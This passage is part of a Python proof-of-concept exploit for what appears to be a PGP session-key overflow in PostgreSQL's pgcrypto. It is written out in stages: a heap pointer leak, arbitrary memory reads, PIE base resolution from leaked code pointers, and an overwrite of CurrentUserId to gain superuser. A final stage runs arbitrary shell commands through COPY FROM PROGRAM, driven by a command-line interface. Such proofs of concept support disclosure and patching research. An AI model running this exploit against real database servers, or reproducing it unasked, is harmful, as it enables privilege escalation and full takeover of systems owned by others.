       PROGRAM to run arbitrary shell commands as the postgres OS user.
    """
    # Stage 1: Leak mdst->data heap pointer via corrupted pfree() error
    leaked_ptr = leak_mdst_pointer(rsa, conn_params)
    if leaked_ptr is None:
        return

    # Stage 2: Overwrite mdst->data with (leaked_ptr - 0x10000) to perform
    # an arbitrary read of heap memory just before our buffer. This region
    # may contain stale PIE code pointers from earlier allocations.
    print("\n### === STAGE 2: exploit with controlled pointer ===\n", file=sys.stderr)
    msg, key = generate_payload(rsa, 'exploit', leaked_ptr)
    sql = build_sql(msg, key)
    result = execute_sql(sql, conn_params)
    # Stage 3: Scan the leaked hex dump for non-heap addresses that look
    # like code pointers (>= 0x500000000000, not matching heap region).
    leaked_addrs = scan_for_pointers(result, leaked_ptr)

    # Stage 4: Resolve PIE base by matching leaked addresses against ELF
    # symbol offsets. Each (addr - sym_offset) that is page-aligned gets
    # a vote. Filter to 10+ vote candidates, pick the smallest base (PIE
    # is the lowest-mapped ELF), sort by votes descending.
    print(f"### Loading symbols from {binary_path}...", file=sys.stderr)
    symbols = load_symbols(binary_path)
    print(f"### Loaded {len(symbols)} symbols", file=sys.stderr)
    votes = resolve_pie_base(leaked_addrs, symbols)
    for base, count in list(votes.items())[:10]:
        print(f"###   PIE candidate: 0x{base:016x} ({count} votes)", file=sys.stderr)
    if not votes:
        print(f"### No PIE candidates", file=sys.stderr)
        return

    current_user_offset = find_symbol_offset(symbols, 'CurrentUserId')
    if current_user_offset is None:
        print(f"### ERROR: CurrentUserId not found in symbols", file=sys.stderr)
        return

    expected_oid = query_expected_oid(conn_params)
    print(f"### Expected CurrentUserId OID: {expected_oid}", file=sys.stderr)

    # Stage 5: Validate PIE candidates by performing an arbitrary read of
    # CurrentUserId at (candidate_base + current_user_offset). If the read
    # value matches our session's known OID, we've found the correct base.
    print(f"\n### === Stage 5: reading CurrentUserId to validate PIE base ===\n", file=sys.stderr)
    confirmed_base = None
    for base, _count in list(votes.items())[:5]:
        confirmed_base = test_pie_candidate(rsa, conn_params, base,
                                            current_user_offset, expected_oid)
        if confirmed_base is not None:
            break

    if confirmed_base is None:
        print(f"\n### WARNING: no candidate matched expected OID {expected_oid}", file=sys.stderr)
        return

    # Stage 6+7: Overwrite CurrentUserId to 10 (superuser OID) and execute command.
    #
    # We use target_addr = current_user_addr - 4 to account for SET_VARSIZE
    # in pgp_pgsql.c:533-534 which writes the output bytea length into the
    # first 4 bytes of the buffer. The decrypted data (p32(10) = OID 10,
    # the bootstrap superuser ID) lands at current_user_addr, giving our
    # session superuser privileges.
    #
    # Once CurrentUserId is overwritten, we can use COPY FROM PROGRAM to
    # execute arbitrary shell commands on the PostgreSQL server.
    print(f"\n### CONFIRMED PIE base: 0x{confirmed_base:016x}", file=sys.stderr)
    current_user_addr = confirmed_base + current_user_offset
    print(f"### CurrentUserId = 0x{current_user_addr:016x}", file=sys.stderr)
    msg = build_arb_write_payload(rsa, leaked_ptr, current_user_addr - 0x4)
    key = build_key_data(rsa)
    sql = build_sql(msg, key)
    conn = execute_sql(sql, conn_params, use_gdb=use_gdb, ret_conn=True)
    cur = conn.cursor()
    cur.execute("SELECT current_user::regrole::oid;")
    changed_oid = cur.fetchone()[0]
    print(f"### CurrentUserId OID Changed From {expected_oid}, To: {changed_oid}", file=sys.stderr)
    print(f"### Executing: {cmd} ...", file=sys.stderr)
    output = execute_privileged_command(conn, cmd)
    print(output)
    conn.close()


def main():
    parser = argparse.ArgumentParser(description="PGP session key overflow PoC")
    parser.add_argument('--dbname', help='PostgreSQL database to connect to')
    parser.add_argument('--host', default='localhost', help='Database host')
    parser.add_argument('--port', type=int, default=5432, help='Database port')
    parser.add_argument('--user', default='postgres', help='Database user')
    parser.add_argument('--password', default='', help='Database password')
    parser.add_argument('--gdb', action='store_true',
                        help='Attach GDB in a tmux pane at the overflow')
    parser.add_argument('--binary', default='/home/varik/projects/pg/pgsql/bin/postgres',
                        help='Path to postgres binary for symbol matching')
    parser.add_argument('--cmd', default='id',
                        help='OS command to execute after successful exploit (default: id)')
    args = parser.parse_args()

    key_size = 3072

    print(f"### Using RSA key size: {key_size} bits", file=sys.stderr)

    rsa = generate_rsa_keypair(key_size)

    conn_params = conn_params_from_args(args)
    run_exploit(rsa, conn_params, args.binary, args.cmd, args.gdb)

if __name__ == "__main__":
    main()